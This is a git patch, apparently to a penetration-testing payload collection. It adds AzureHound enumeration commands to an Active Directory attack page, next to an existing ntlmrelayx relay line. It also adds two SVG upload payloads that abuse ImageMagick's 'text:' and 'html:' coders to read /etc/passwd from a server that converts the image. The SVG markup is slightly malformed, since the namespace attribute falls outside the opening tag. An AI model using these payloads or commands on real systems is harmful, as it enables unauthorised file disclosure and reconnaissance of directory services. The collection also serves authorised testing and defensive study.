From b918095775223ea682d7ee8331eb59ae32cf1e66 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Tue, 24 Nov 2020 12:41:34 +0100
Subject: [PATCH] AzureHound

---
 Methodology and Resources/Active Directory Attack.md  | 11 +++++++++++
 .../Picture Image Magik/convert_local_etc_passwd.svg  |  5 +++++
 .../convert_local_etc_passwd_html.svg                 |  5 +++++
 3 files changed, 21 insertions(+)
 create mode 100644 Upload Insecure Files/Picture Image Magik/convert_local_etc_passwd.svg
 create mode 100644 Upload Insecure Files/Picture Image Magik/convert_local_etc_passwd_html.svg

diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index 9af421a..d379470 100644
--- a/Methodology and Resources/Active Directory Attack.md	
+++ b/Methodology and Resources/Active Directory Attack.md	
@@ -141,6 +141,17 @@
   ntlmrelayx.py -t ldaps://lab.local -wh attacker-wpad --delegate-access
   ```
 
+* [AzureHound](https://posts.specterops.io/introducing-bloodhound-4-0-the-azure-update-9b2b26c5e350)
+
+  ```powershell
+  # require: Install-Module -name Az -AllowClobber
+  # require: Install-Module -name AzureADPreview -AllowClobber
+  Connect-AzureAD
+  Connect-AzAccount
+  . .\AzureHound.ps1
+  Invoke-AzureHound
+  ```
+
 * [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon)
 
   ```powershell
diff --git a/Upload Insecure Files/Picture Image Magik/convert_local_etc_passwd.svg b/Upload Insecure Files/Picture Image Magik/convert_local_etc_passwd.svg
new file mode 100644
index 0000000..64cb757
--- /dev/null
+++ b/Upload Insecure Files/Picture Image Magik/convert_local_etc_passwd.svg	
@@ -0,0 +1,5 @@
+<svg width="1000" height="1000" 
+xmlns:xlink="http://www.w3.org/1999/xlink">
+xmlns="http://www.w3.org/2000/svg">       
+<image xlink:href="text:/etc/passwd" height="500" width="500"/>
+</svg>
\ No newline at end of file
diff --git a/Upload Insecure Files/Picture Image Magik/convert_local_etc_passwd_html.svg b/Upload Insecure Files/Picture Image Magik/convert_local_etc_passwd_html.svg
new file mode 100644
index 0000000..7981193
--- /dev/null
+++ b/Upload Insecure Files/Picture Image Magik/convert_local_etc_passwd_html.svg	
@@ -0,0 +1,5 @@
+<svg width="1000" height="1000" 
+xmlns:xlink="http://www.w3.org/1999/xlink">
+xmlns="http://www.w3.org/2000/svg">       
+<image xlink:href="html:/etc/passwd" height="500" width="500"/>
+</svg>
\ No newline at end of file